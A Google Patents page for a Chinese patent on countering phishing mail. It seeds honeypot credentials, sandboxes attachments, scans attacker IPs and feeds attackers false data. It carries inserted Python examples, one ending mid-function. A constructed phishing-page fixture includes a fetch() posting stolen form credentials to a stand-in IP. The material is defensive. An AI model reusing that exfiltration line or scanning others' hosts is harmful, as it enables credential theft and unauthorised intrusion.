CN117278288A - Network attack protection method and device, electronic equipment and storage medium - Google Patents

Info

Publication number: CN117278288A
Authority: CN (China)
Application number: CN202311261640.3A
Other languages: Chinese (zh)
Inventors: 王瀚, 李劼杰
Current assignee: Beijing QIYI Century Science and Technology Co Ltd
Original assignee: Beijing QIYI Century Science and Technology Co Ltd
Legal status: Pending
Prior art keywords: attacker, attack, information, attack information, protection

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1441 Countermeasures against malicious traffic
    • H04L 63/1483 Countermeasures against malicious traffic: service impersonation, e.g. phishing, pharming or web spoofing
    • H04L 63/20 Network architectures or network communication protocols for network security for managing network security; network security policies in general
    • H04L 63/205 Network architectures or network communication protocols for network security for managing network security; network security policies in general involving negotiation or determination of the one or more network security mechanisms to be used, e.g. by negotiation between the client and the server or between peers or by selection according to the capabilities of the entities involved
    • H04L 9/00 Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L 9/40 Network security protocols

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

The embodiments of the invention provide a network attack protection method, a device, an electronic device and a storage medium. They relate to the technical field of information security and are applied to a security device. The network attack protection method comprises the following steps: acquiring phishing mails among the mails sent to a mailbox protected by a mail protection device; responding, in a virtual environment, to the operation requested by the phishing mail, and obtaining attack information of the attacker corresponding to the phishing mail based on the execution result of that operation; maintaining a protection policy according to the attack information; and enforcing the maintained protection policy through an attack protection program. The scheme provided by the embodiments of the invention can improve the strength of protection against network attacks.

Description

Network attack protection method and device, electronic equipment and storage medium
Technical Field
The present invention relates to the field of information security technologies, and in particular to a method and apparatus for protecting against network attacks, an electronic device, and a storage medium.
Background
Phishing mail, as a common means of network attack, is one of the major threats to enterprise network security. In the prior art, enterprise security devices generally protect against network attacks by intercepting phishing mails. This protection against phishing mails is therefore too passive, and its protective strength is low.
Disclosure of Invention
The embodiments of the invention aim to provide a network attack protection method, a network attack protection device, an electronic device and a storage medium, so as to improve the degree of protection against network attacks. The specific technical scheme is as follows:
In a first aspect of the present invention, there is provided a network attack protection method applied to a security device, the method including:
acquiring phishing mails among the mails sent to a mailbox protected by a mail protection device;
responding, in a virtual environment, to the operation requested by the phishing mail, and obtaining attack information of the attacker corresponding to the phishing mail based on the execution result of the operation;
maintaining a protection policy according to the attack information;
and enforcing the maintained protection policy through an attack protection program.
Optionally, the phishing mail comprises connection information of a phishing website;
the responding, in the virtual environment, to the operation requested by the phishing mail and obtaining the attack information of the attacker based on the execution result of the operation comprises the following steps:
analyzing the website code and/or network requests of the phishing website based on the connection information of the phishing website, and identifying a background interface of the phishing website;
sending a monitored honeypot account and its password information to the attacker's device through the background interface;
and, in response to the attacker logging in to the honeypot account based on the password information, obtaining the login record of the honeypot account as attack information of the attacker.
Optionally, the method further comprises:
determining an Internet protocol address of the attacker based on at least one of the website code, the network requests and the login record of the phishing website;
and carrying out vulnerability scanning on the Internet protocol address of the attacker, and taking the detected vulnerabilities as attack information of the attacker.
Optionally, the obtaining of the login record of the honeypot account as attack information of the attacker includes:
obtaining at least one of the Internet protocol address, the user agent and the device fingerprint associated with the honeypot account, and the access behavior of the honeypot account, as attack information of the attacker.
Optionally, the phishing mail comprises a malicious file, wherein the malicious file comprises a computer virus or a file carrying a computer virus;
the responding, in the virtual environment, to the operation requested by the phishing mail and obtaining the attack information of the attacker based on the execution result of the operation comprises the following steps:
analyzing the file type of the malicious file;
running the malicious file in a sandbox running environment corresponding to the file type;
and monitoring the running behavior of the malicious file, and taking the obtained monitoring result as attack information of the attacker.
Optionally, the monitoring of the running behavior of the malicious file and taking the obtained monitoring result as attack information of the attacker includes:
monitoring the network requests generated by running the malicious file, and acquiring, based on the monitoring result, the Internet protocol address associated with the network requests as attack information of the attacker;
and/or
monitoring the execution path of a backdoor program released by the malicious file, and taking the execution path as attack information of the attacker.
Optionally, the monitoring of the running behavior of the malicious file and taking the obtained monitoring result as attack information of the attacker includes:
monitoring the running behavior of the malicious file and, based on the monitoring result, obtaining file fingerprints of the malicious file and/or registry information of the malicious file as attack information of the attacker.
Optionally, the method further comprises:
monitoring the operations that the attacker requests the target server to execute, and obtaining attack information of the attacker based on the monitoring result, wherein the target server is the virtual server to which the phishing mail requests a connection.
Optionally, the method further comprises:
querying a third-party platform for information matching the obtained attack information of the attacker, to serve as further attack information of the attacker.
Optionally, the maintaining of a protection policy according to the attack information includes at least one of the following:
maintaining an interception policy for phishing mails according to the attack information;
maintaining a vulnerability remediation policy according to the attack information;
and maintaining a policy for interfering with attack behavior according to the attack information.
Optionally, the enforcing of the maintained protection policy through the attack protection program includes:
disconnecting the connection with the attacker's device through the attack protection program;
and/or
sending false information to the attacker's device through the attack protection program.
In a second aspect of the present invention, there is also provided a network attack protection device, the device including:
a phishing mail obtaining module, used for obtaining phishing mails among the mails sent to a mailbox protected by the mail protection device;
an attack information obtaining module, used for responding, in a virtual environment, to the operation requested by the phishing mail and obtaining attack information of the attacker corresponding to the phishing mail based on the execution result of the operation;
a protection policy maintenance module, used for maintaining a protection policy according to the attack information;
and a network attack protection module, used for enforcing the maintained protection policy through an attack protection program.
Optionally, the phishing mail comprises connection information of a phishing website;
the attack information obtaining module comprises:
an interface identification unit, used for analyzing the website code and/or network requests of the phishing website based on the connection information of the phishing website and identifying the background interface of the phishing website;
an account sending unit, used for sending the monitored honeypot account and its password information to the attacker's device through the background interface;
and a first attack information obtaining unit, used for obtaining, in response to the attacker logging in to the honeypot account based on the password information, the login record of the honeypot account as attack information of the attacker.
Optionally, the device further includes:
an address determining module, used for determining the Internet protocol address of the attacker based on at least one of the website code, the network requests and the login record of the phishing website;
and a vulnerability scanning module, used for carrying out vulnerability scanning on the Internet protocol address of the attacker and taking the detected vulnerabilities as attack information of the attacker.
Optionally, the first attack information obtaining unit is specifically configured to obtain at least one of the Internet protocol address, the user agent and the device fingerprint associated with the honeypot account, and the access behavior of the honeypot account, as attack information of the attacker.
Optionally, the phishing mail comprises a malicious file, wherein the malicious file comprises a computer virus or a file carrying a computer virus;
the attack information obtaining module comprises:
a file type analysis unit, used for analyzing the file type of the malicious file;
a file running unit, used for running the malicious file in a sandbox running environment corresponding to the file type;
and a second attack information obtaining unit, used for monitoring the running behavior of the malicious file and taking the obtained monitoring result as attack information of the attacker.
Optionally, the second attack information obtaining unit is specifically configured to monitor the network requests generated by running the malicious file and obtain, based on the monitoring result, the Internet protocol address associated with the network requests as attack information of the attacker; and/or to monitor the execution path of a backdoor program released by the malicious file and take the execution path as attack information of the attacker.
Optionally, the second attack information obtaining unit is specifically configured to monitor the running behavior of the malicious file and obtain, based on the monitoring result, file fingerprints of the malicious file and/or registry information of the malicious file as attack information of the attacker.
Optionally, the device further includes:
an operation monitoring module, used for monitoring the operations that the attacker requests the target server to execute and obtaining attack information of the attacker based on the monitoring result, wherein the target server is the virtual server to which the phishing mail requests a connection.
Optionally, the device further includes:
an information query module, used for querying a third-party platform for information matching the obtained attack information of the attacker, to serve as further attack information of the attacker.
Optionally, the protection policy maintenance module is specifically configured to perform at least one of the following: maintaining an interception policy for phishing mails according to the attack information; maintaining a vulnerability remediation policy according to the attack information; and maintaining a policy for interfering with attack behavior according to the attack information.
Optionally, the network attack protection module is specifically configured to disconnect the connection with the attacker's device; and/or to send false information to the attacker's device.
In a third aspect of the embodiments of the present invention, there is provided an electronic device including a processor, a communication interface, a memory and a communication bus, wherein the processor, the communication interface and the memory communicate with each other through the communication bus;
the memory is used for storing a computer program;
and the processor is used for implementing the network attack protection method according to the first aspect when executing the program stored in the memory.
In yet another aspect of the embodiments of the present invention, a computer-readable storage medium is provided, in which a computer program is stored; when the computer program is executed by a processor, it implements the network attack protection method according to the first aspect.
According to the network attack protection scheme provided by the embodiments of the invention, the operation requested by a phishing mail is carried out in a virtual environment, so that the attack information of the attacker can be obtained from that operation. Because the requested operation is performed in the virtual environment, it causes no real attack, yet it exposes the attacker's attack information. The security device may then maintain a protection policy according to the attacker's attack information and enforce the maintained policy. Since the protection policy is maintained on the basis of attack information collected by the security device from what the attacker's network attack exposed in the virtual environment, the resulting policy is tailored to the attacker's type of network attack, and enforcing it protects against the attack effectively. Thus, applying the scheme provided by the embodiments of the invention improves the degree of protection against network attacks.
Drawings
To describe more clearly the embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the embodiments or of the prior art are briefly introduced below.
Fig. 1 is a flow chart of a first network attack protection method according to an embodiment of the present invention;
Fig. 2 is a flow chart of a second network attack protection method according to an embodiment of the present invention;
Fig. 3 is a block flow diagram of a first method for obtaining attack information according to an embodiment of the present invention;
Fig. 4 is a flow chart of a third network attack protection method according to an embodiment of the present invention;
Fig. 5 is a block flow diagram of a second method for obtaining attack information according to an embodiment of the present invention;
Fig. 6 is a schematic structural diagram of a network attack protection device according to an embodiment of the present invention;
Fig. 7 is a schematic structural diagram of an electronic device according to an embodiment of the present invention.
Detailed Description
The technical solutions in the embodiments of the present invention are described below with reference to the accompanying drawings.
The execution subject of the scheme provided by the embodiments of the invention is described first.
The execution subject may be a security device, which may be a desktop computer, a server, or the like.
The network attack protection scheme provided by the embodiments of the present invention is described in detail below through a specific embodiment.
Referring to Fig. 1, a flow chart of a first network attack protection method is provided; the method includes the following steps S101 to S104.
Step S101: obtaining phishing mails among the mails sent to the mailbox protected by the mail protection device.
The mail protection device may be a desktop computer, a server, or the like; for example, it may be an email protection gateway device, or a device used by a user to log in to an email mailbox.
The protected mailbox may be an email mailbox logged in on the security device, or a mailbox logged in on a device in the same local area network as the security device; the embodiment of the present invention does not limit this.
A phishing mail is an email whose main purpose is to defraud users of important information and to spread malicious programs; it is a means of network attack. In general, a phishing mail carries connection information of a phishing website or a malicious file.
The manner in which the phishing mail is obtained is described below.
In a first implementation, the mail protection device may identify the mail content of each mail sent to the protected mailbox and determine the phishing mails in the protected mailbox according to the identification result, so that the security device may obtain them. For example, the mail protection device may identify a mail whose content includes connection information of a website, determine based on the connection information whether the website is a phishing website, and thereby determine that a mail including connection information of a phishing website is a phishing mail.
The mail protection device may determine whether the website is a phishing website according to the website's security authentication information; for example, it may query a third-party security authentication platform for the website's security authentication information according to the connection information, and determine a website for which no security authentication information is found to be a phishing website. The mail protection device may also judge whether the website is a phishing website according to phishing website information stored in a database: specifically, it may search the database for phishing website information matching the website, and if a match is found, determine the website to be a phishing website. The embodiment of the present invention does not limit this.
In a second implementation, the mail protection device may identify the attachments carried by each mail sent to the protected mailbox and determine the phishing mails in the protected mailbox according to the identification result, so that the security device may obtain them. For example, the mail protection device may determine that a mail carrying a malicious file is a phishing mail.
Specifically, the mail protection device may identify the digital signature of an attachment carried by the mail and determine that an attachment without a digital signature is a malicious file. For an attachment with a digital signature, the mail protection device may identify the issuer of the signature and match it against the issuer whitelist recorded in the database; if the match fails, the attachment is determined to be a malicious file. Of course, a blacklist of digital signature issuers may also be recorded in the database, in which case the mail protection device matches the issuer of the attachment's signature against the recorded blacklist, and if the match succeeds, determines the attachment to be a malicious file.
In addition, the mail protection device may also use antivirus software to identify the attachment. The embodiment of the present invention does not limit this.
In a third implementation, the mail protection device may match the sender information of each mail sent to the protected mailbox against the sender information of phishing mails stored in the database, and determine that a mail sent by a matching sender is a phishing mail.
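The three implementations above, combined into one triage routine, as an added example (not code from the patent or its applicant). The database contents, the stand-in for the third-party security authentication platform, and the sample mails are all constructed for illustration.

```python
"""Phishing-mail triage following the three implementations of step S101 (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")


@dataclass
class Attachment:
    name: str
    signature_issuer: Optional[str]  # None means the attachment carries no digital signature


@dataclass
class Mail:
    sender: str
    body: str
    attachments: List[Attachment] = field(default_factory=list)


@dataclass
class ThreatDb:
    """Constructed stand-in for the database and the third-party security authentication platform."""
    certified_hosts: Set[str]     # hosts for which the third-party platform returns authentication info
    phishing_hosts: Set[str]      # recorded phishing website information
    issuer_allowlist: Set[str]    # digital signature issuer whitelist
    issuer_blocklist: Set[str]    # digital signature issuer blacklist
    phishing_senders: Set[str]    # recorded phishing mail sender information


def is_phishing_site(host: str, db: ThreatDb) -> bool:
    # First implementation: no security authentication info found, or a database match.
    return host not in db.certified_hosts or host in db.phishing_hosts


def is_malicious_attachment(att: Attachment, db: ThreatDb) -> bool:
    # Second implementation: unsigned, issuer on the blacklist, or issuer not on the whitelist.
    if att.signature_issuer is None:
        return True
    if att.signature_issuer in db.issuer_blocklist:
        return True
    return att.signature_issuer not in db.issuer_allowlist


def classify(mail: Mail, db: ThreatDb) -> List[str]:
    """Return the reasons a mail is judged to be phishing; an empty list means it passed."""
    reasons = []
    for url in URL_RE.findall(mail.body):
        host = urlparse(url).hostname or ""
        if is_phishing_site(host, db):
            reasons.append(f"link to phishing website {host}")
    for att in mail.attachments:
        if is_malicious_attachment(att, db):
            reasons.append(f"malicious attachment {att.name}")
    # Third implementation: sender matches recorded phishing senders.
    if mail.sender.lower() in db.phishing_senders:
        reasons.append(f"known phishing sender {mail.sender}")
    return reasons


# Constructed sample data; none of it comes from the patent.
DB = ThreatDb(
    certified_hosts={"mail.example-corp.test", "portal.example-corp.test"},
    phishing_hosts={"login.example-corp-secure.test"},
    issuer_allowlist={"Example Corp Code Signing CA"},
    issuer_blocklist={"Untrusted Free CA"},
    phishing_senders={"hr-notice@example-corp-secure.test"},
)

SAMPLE_MAILS = [
    Mail("it@mail.example-corp.test", "Portal: https://portal.example-corp.test/reset",
         [Attachment("policy.pdf", "Example Corp Code Signing CA")]),
    Mail("hr-notice@example-corp-secure.test",
         "Verify now: https://login.example-corp-secure.test/verify",
         [Attachment("payroll.xlsm", None)]),
    Mail("vendor@partner.test", "Invoice attached",
         [Attachment("invoice.exe", "Untrusted Free CA")]),
]


def triage(mails=SAMPLE_MAILS, db=DB) -> List[List[str]]:
    """Classify every mail; the security device would collect those with a non-empty result."""
    return [classify(m, db) for m in mails]


if __name__ == "__main__":
    for mail, reasons in zip(SAMPLE_MAILS, triage()):
        print(mail.sender, "->", "phishing: " + "; ".join(reasons) if reasons else "clean")
```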
Step S102: responding, in a virtual environment, to the operation requested by the phishing mail, and obtaining attack information of the attacker corresponding to the phishing mail based on the execution result of the operation.
As described for step S101, the phishing mail may carry connection information of a phishing website or may carry a malicious file. The operation requested may differ for phishing mails carrying different content.
For example, for a phishing mail carrying connection information of a phishing website, the requested operation may be that the user enter their own account information and password information on the phishing website; for a phishing mail carrying a malicious file, the requested operation may be to download and run the malicious file.
The attack information of the attacker may include information about the attacker's attack device, the attacker's attack intention, and so on.
The attack information obtained and the manner of obtaining it are described further below for the different cases, and are not detailed here.
Step S103: maintaining a protection policy according to the attack information.
Since the attack information of the attacker may include various kinds of information, different protection policies may be maintained based on different attack information.
The maintenance of the protection policy in the different situations is described further below and is not detailed here.
Step S104: enforcing the maintained protection policy through an attack protection program.
Corresponding to the description of step S103, the manner of enforcement may differ for different protection policies, and so may the attack protection program. The enforcement of the protection policy in the different situations is described further below and is not detailed here.
By applying the scheme provided by the embodiments of the invention, the operation requested by a phishing mail is carried out in a virtual environment, so that the attack information of the attacker can be obtained from that operation. Because the requested operation is performed in the virtual environment, it causes no real attack, yet it exposes the attacker's attack information. The security device may then maintain a protection policy according to the attacker's attack information and enforce it through an attack protection program. Since the protection policy is maintained on the basis of attack information collected by the security device from what the attacker's network attack exposed in the virtual environment, the resulting policy is tailored to the attacker's type of network attack, and enforcing it protects against the attack effectively. Thus, applying the scheme provided by the embodiments of the invention improves the degree of protection against network attacks.
As described for step S102, the phishing mail may include different contents; in one case, it includes connection information of a phishing website.
For this situation, in one embodiment of the present invention, referring to Fig. 2, a flow chart of a second network attack protection method is provided. In this embodiment, step S102 may be completed by the following steps S102A to S102C.
Step S102A: analyzing the website code and/or network requests of the phishing website based on its connection information, and identifying the background interface of the phishing website.
The security device may connect to the phishing website through its connection information. The interface of a phishing website is usually disguised as the login interface of a bank, an e-commerce site or an enterprise internal system, misleading the user into believing that the account information and password information entered will be sent to the server of the imitated system. In practice, when the user enters their account information and password information on the interface, the phishing website sends them through its background interface to the attacker's attack device, so that the attacker can obtain them and log in to the user's account with them.
The security device may analyze the website code of the phishing website and identify in it the code of the background interface called by the phishing website; it may also analyze the network requests of the phishing website and determine the interface called when a network request is made as the background interface of the phishing website.
The security device may also obtain the attacker's Internet protocol address by analyzing the website code and/or network requests of the phishing website.
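Step S102A (and the website-code part of step A below) worked on page source, as an added example that is not the patent's own code: the background interface is taken from the form action and from the endpoints the page's script posts to, and any endpoint whose host is an IP literal yields an address directly. The page URL and the HTML are constructed to imitate a disguised login interface.

```python
"""Identifying a phishing website's background interface from its page source (added example)."""
import ipaddress
import re
from html.parser import HTMLParser
from typing import List
from urllib.parse import urljoin, urlparse

# Constructed phishing page source imitating a mail sign-in interface; not taken from the patent.
PAGE_URL = "https://login.example-corp-secure.test/auth/index.html"
PAGE_HTML = """
<html><body>
<h1>Example Corp Mail Sign-in</h1>
<form id="login" method="post" action="/api/collect.php">
  <input name="user"><input name="pass" type="password">
</form>
<script>
  document.getElementById("login").addEventListener("submit", function (e) {
    e.preventDefault();
    fetch("http://203.0.113.45:8080/gate/submit", {method: "POST", body: new FormData(e.target)});
    var x = new XMLHttpRequest(); x.open("POST", "https://cdn.example-corp-secure.test/track");
  });
</script>
</body></html>
"""


class FormActionParser(HTMLParser):
    """Collects the action attribute of every <form> in the page."""

    def __init__(self):
        super().__init__()
        self.actions: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            for name, value in attrs:
                if name == "action" and value:
                    self.actions.append(value)


# Endpoints passed to fetch(...) or XMLHttpRequest.open(METHOD, ...) in inline script.
JS_ENDPOINT_RE = re.compile(
    r"""(?:fetch\(\s*|\.open\(\s*["'][A-Z]+["']\s*,\s*)["']([^"']+)["']"""
)


def find_background_interfaces(page_url: str, html: str) -> List[str]:
    """Step S102A: URLs the login page sends submitted credentials to, resolved against the page URL."""
    parser = FormActionParser()
    parser.feed(html)
    raw = parser.actions + JS_ENDPOINT_RE.findall(html)
    seen, resolved = set(), []
    for target in raw:
        url = urljoin(page_url, target)  # relative actions become absolute URLs
        if url not in seen:
            seen.add(url)
            resolved.append(url)
    return resolved


def literal_ip_hosts(urls: List[str]) -> List[str]:
    """Step A: background interfaces addressed by an IP literal expose that address directly."""
    ips = []
    for url in urls:
        host = urlparse(url).hostname
        try:
            ips.append(str(ipaddress.ip_address(host)))
        except ValueError:
            pass  # a hostname rather than an IP literal; name resolution is out of scope here
    return ips


if __name__ == "__main__":
    interfaces = find_background_interfaces(PAGE_URL, PAGE_HTML)
    print("background interfaces:", interfaces)
    print("IP literals:", literal_ip_hosts(interfaces))
```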
Step S102B: sending the monitored honeypot account and its password information to the attacker's device through the background interface.
The honeypot account is preconfigured and does not belong to any real user; the password information is the password corresponding to the honeypot account.
Step S102C: in response to the attacker logging in to the honeypot account based on the password information, obtaining the login record of the honeypot account as attack information of the attacker.
When the attacker logs in to the monitored honeypot account based on the password information, the attacker's device sends a login request to the security device, which obtains the login request through its monitoring of the honeypot account. The login request can carry various information, and the security device can obtain the information carried in it as attack information of the attacker.
The following describes the various cases in which the security device obtains information carried in a login request as attack information of the attacker.
In the first case, the security device may obtain an internet protocol address associated with the honeypot account carried in the login request as attack information of an attacker.
In the second case, the security device may obtain the user agent associated with the honeypot account carried in the login request as attack information of the attacker.
Specifically, the user agent associated with the honeypot account may include an operating system and version used by an attacker, a CPU type, a browser and version, a browser rendering engine, a browser language, a browser plug-in, and the like.
In the third case, the security device may obtain a device fingerprint associated with the honeypot account carried in the login request, as attack information of an attacker.
For example, the device fingerprint associated with the honeypot account may be the MAC (Media Access Control) address of the attacker's attack device.
In addition, the security device can also obtain the access behavior of the honeypot account as attack information of the attacker.
For example, an attacker may access part of a database, internal software, or a project management platform by logging in to the honeypot account. The security device may record this access behavior as attack information of the attacker.
The security device may obtain the information of any one of the above cases as attack information of the attacker, or a combination of the information of several cases. The embodiment of the present invention does not limit this.
Thus, the security device can obtain various kinds of information about the attacker, and the attack information obtained is rich and comprehensive.
The honeypot account and its password information are sent to the attacker's device through the background interface of the phishing website included in the phishing mail, so that the attacker is induced to log in to the honeypot account. Because the honeypot account is monitored, when the attacker logs in to it the security device can obtain its login record as attack information of the attacker. In this way, the security device can obtain attack information of the attacker in response to the operation requested by a phishing mail containing connection information of a phishing website.
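Step S102C and the four cases above, followed by step S103, as an added example (not the patent's own code): authentication and access log lines are scanned for logins to seeded honeypot accounts, the Internet protocol address, user agent, device fingerprint and subsequent access behavior are collected as attack information, and an interception and interference policy is derived from it. The honeypot account names, campaign labels and log lines are constructed.

```python
"""Honeypot-account login monitoring and policy maintenance (added example)."""
import json
from typing import Dict, List

# Constructed: honeypot accounts seeded through phishing-site background interfaces,
# keyed by account name, with the phishing campaign each was seeded to.
HONEYPOT_ACCOUNTS = {
    "hp.finance01": "campaign-2023-09-A",
    "hp.devops02": "campaign-2023-09-B",
}

# Constructed authentication/access log, one JSON object per line, as a security device might collect it.
SAMPLE_LOG = """\
{"event":"login","user":"alice","ip":"10.0.5.12","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/117.0","fp":"f1a2"}
{"event":"login","user":"hp.finance01","ip":"203.0.113.77","ua":"Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0","fp":"9c3e"}
{"event":"access","user":"hp.finance01","ip":"203.0.113.77","resource":"/db/customers/export"}
{"event":"access","user":"hp.finance01","ip":"203.0.113.77","resource":"/pm/projects/roadmap"}
{"event":"login","user":"hp.devops02","ip":"198.51.100.9","ua":"python-requests/2.31","fp":"0000"}
{"event":"access","user":"alice","ip":"10.0.5.12","resource":"/mail/inbox"}
"""


def parse_user_agent(ua: str) -> Dict[str, str]:
    """Minimal user-agent parser: pulls the operating system token and the trailing browser token."""
    os_name = "unknown"
    for token in ("Windows", "Linux", "Mac OS X", "Android", "iPhone"):
        if token in ua:
            os_name = token
            break
    browser = ua.rsplit(" ", 1)[-1] if " " in ua else ua
    return {"os": os_name, "browser": browser}


def collect_attack_information(log_text: str, honeypots=HONEYPOT_ACCOUNTS) -> List[dict]:
    """Step S102C: turn honeypot logins and the access that followed into attacker attack information."""
    records: Dict[str, dict] = {}
    for line in log_text.splitlines():
        ev = json.loads(line)
        user = ev["user"]
        if user not in honeypots:
            continue  # a real user's activity is not attack information
        rec = records.setdefault(user, {
            "campaign": honeypots[user], "ips": set(), "user_agents": [],
            "device_fingerprints": set(), "access_behavior": [],
        })
        rec["ips"].add(ev["ip"])                      # first case: Internet protocol address
        if ev["event"] == "login":
            rec["user_agents"].append(parse_user_agent(ev["ua"]))  # second case: user agent
            rec["device_fingerprints"].add(ev["fp"])  # third case: device fingerprint
        elif ev["event"] == "access":
            rec["access_behavior"].append(ev["resource"])  # fourth case: access behavior
    return [dict(account=u, **r) for u, r in records.items()]


def derive_protection_policy(attack_info: List[dict]) -> dict:
    """Step S103: an interception policy and an interference policy maintained from the attack information."""
    return {
        # interception: source addresses that logged in to honeypot accounts
        "intercept_source_ips": sorted({ip for r in attack_info for ip in r["ips"]}),
        # interference: disconnect the attacker's sessions on the compromised honeypot accounts
        "disconnect_sessions_of": sorted(r["account"] for r in attack_info),
        # resources the attacker reached, to alert on for any other account
        "alert_on_resources": sorted({res for r in attack_info for res in r["access_behavior"]}),
    }


if __name__ == "__main__":
    info = collect_attack_information(SAMPLE_LOG)
    print(json.dumps(info, indent=1, default=sorted))
    print(json.dumps(derive_protection_policy(info), indent=1))
```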
In one embodiment of the present invention, the following steps a-B may be further included on the basis of the embodiment shown in fig. 2.
Step A: and determining the Internet protocol address of the attacker based on at least one of the information of the website code, the network request and the login record of the phishing website.
As described above, the security device may analyze the website code and the network request of the phishing website to obtain the internet protocol address of the attacker.
Specifically, the website code of the phishing website may include the internet protocol address of the attacker, and at this time, the security device may obtain the internet protocol address of the attacker by analyzing the website code of the phishing website.
In addition, the security device may also determine an internet protocol address requested by the network request of the phishing website as an internet protocol address of the attacker.
Specifically, the security device may obtain, based on the format of the network request, an internet protocol address carried in a request header of the network request as an internet protocol address associated with the network request.
The determination of the internet protocol address of the attacker based on the login record is consistent with the description at step S103C above.
Step B: performing vulnerability scanning on the internet protocol address of the attacker, and taking the detected vulnerabilities as attack information of the attacker.
The vulnerability scanning may include ping scanning, port scanning, OS (Operating System) detection, vulnerability detection, firewall scanning, etc.
Specifically, a ping scan can identify whether the attacker's internet protocol address is alive; a port scan can identify which ports are open on the device corresponding to the attacker's internet protocol address; OS detection can identify the operating system of the device corresponding to the attacker's internet protocol address; vulnerability detection can identify vulnerabilities present on the device corresponding to the attacker's internet protocol address; and a firewall scan can identify the filter rules of the firewall of the device corresponding to the attacker's internet protocol address.
Thus, vulnerability scanning is carried out on the Internet protocol address of the attacker, vulnerability information of equipment corresponding to the Internet protocol address of the attacker can be obtained, and the vulnerability information is used as attack information of the attacker, so that the variety of the obtained attack information is enriched.
The attack information acquisition method for a phishing mail including connection information of a phishing website is described in its entirety below.
Referring to fig. 3, a block flow diagram of a first way of obtaining attack information is provided.
It can be seen that after the security device obtains the phishing mail, the security device analyzes the phishing website indicated by the connection information in the phishing mail; specifically, the security device analyzes the website code and the network request of the phishing website.
Based on the analysis result, the security device sends the honeypot account and password information to the attacker's device through the background interface of the phishing website. The honeypot account is a monitored account, and the security device monitors logins to it, so that the login information of the account is obtained and used as attack information.
In addition, the security device monitors the request sent by the attacker to the virtual server through the account, so that attack information is further obtained.
Based on the above process, the security device may further perform vulnerability scanning on the phishing website, perform vulnerability scanning on the attacker's IP (Internet Protocol) address according to the attacker's IP address in the obtained attack information, and obtain attack information based on the scanning result.
As described above with respect to step S102, the phishing mail may include different content therein, and in one case, malicious files may be included therein.
The malicious files include computer viruses or files carrying computer viruses.
In response to this situation, in one embodiment of the present invention, referring to fig. 4, a flow chart of a third network attack protection method is provided. In this embodiment, the above step S102 may be completed by the following steps S102D to S102F.
Step S102D: the file type of the malicious file is analyzed.
The file types may be text file types, video file format types, audio file format types, picture file format types, executable file format types, etc., each of which may exist in different formats.
Specifically, the security device may analyze the file type of the malicious file in the following manner.
In a first implementation, the security device may determine a file type of the malicious file according to a file extension of the malicious file.
The file extension is a string of characters at the end of the file name. For example, a file name ending with ".docx" indicates that the file is a Word document, and ".jpg" indicates that the file is a JPEG image.
In a second implementation, the security device may determine the file type of the malicious file through file header information of the malicious file.
The file header information is a piece of content at the beginning of the file and typically contains some specific characters. From these specific characters, the security device can determine the format to which the file belongs. For example, the file header information of a text file typically starts with 0xEFBBBF (the UTF-8 byte order mark), and the file header information of a PDF file typically starts with "%PDF".
Step S102E: running the malicious file in the sandbox operating environment corresponding to the file type.
The sandbox operating environment is a virtual system program, and the programs running inside the sandbox operating environment cannot permanently affect the hard disk.
Malicious files of different file types require different operating environments. For example, for Office documents, the running environment is Office software; for exe files, the running environment is a Windows operating system; for apk files, the running environment is an Android operating system.
The security device may create a corresponding sandboxed operating environment based on the file type determined in step S102D.
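The file type analysis of step S102D and the choice of sandbox in step S102E, as an added Python example (not the patent's code). Both implementations from the text are shown: the type from the file extension and the type from the file header. The magic-byte table, the extension table and the sandbox names are constructed for the example; the combination rule (trust the header over the extension, and flag a mismatch between them) is an addition that a practitioner would want, because the attachment's name is chosen by the attacker while the leading bytes are dictated by the format.

```python
"""File type identification by extension and by file header, and choice of
the sandbox environment for that type.

Added example, not the patent's code. The magic-byte table, the extension
table and the type-to-sandbox names are constructed for illustration.
"""
import os
from typing import Optional, Tuple

# Leading bytes of common formats. Office Open XML (.docx/.xlsx) and Android
# packages (.apk) are ZIP containers, so their header only says "zip".
MAGIC = [
    (b"%PDF", "pdf"),
    (b"MZ", "exe"),
    (b"PK\x03\x04", "zip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xef\xbb\xbf", "text"),   # UTF-8 byte order mark, the text-file header named above
]
EXT_TYPES = {
    ".docx": "docx", ".xlsx": "xlsx", ".apk": "apk", ".pdf": "pdf",
    ".exe": "exe", ".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".txt": "text",
}
ZIP_CONTAINERS = {"docx", "xlsx", "apk"}
# Constructed sandbox names: Office documents run under Office software, .exe
# under Windows and .apk under Android, as the text describes.
SANDBOX_FOR_TYPE = {
    "docx": "office", "xlsx": "office", "exe": "windows", "apk": "android",
    "pdf": "pdf-reader", "jpeg": "image-viewer", "png": "image-viewer",
    "text": "text-viewer",
}


def type_from_extension(name: str) -> Optional[str]:
    """First implementation: the string after the last dot of the file name."""
    return EXT_TYPES.get(os.path.splitext(name)[1].lower())


def type_from_header(data: bytes) -> Optional[str]:
    """Second implementation: the specific bytes at the start of the file."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def identify(name: str, data: bytes) -> Tuple[Optional[str], bool, str]:
    """Combine both implementations.

    The header is trusted over the extension, because the sender controls the
    name but cannot change the bytes a format needs in order to be parsed. A
    ZIP header is refined by the extension to tell Office documents from
    Android packages. Returns (type, mismatch, sandbox); mismatch is True when
    the name claimed something other than what the bytes show.
    """
    ext_type = type_from_extension(name)
    header_type = type_from_header(data)
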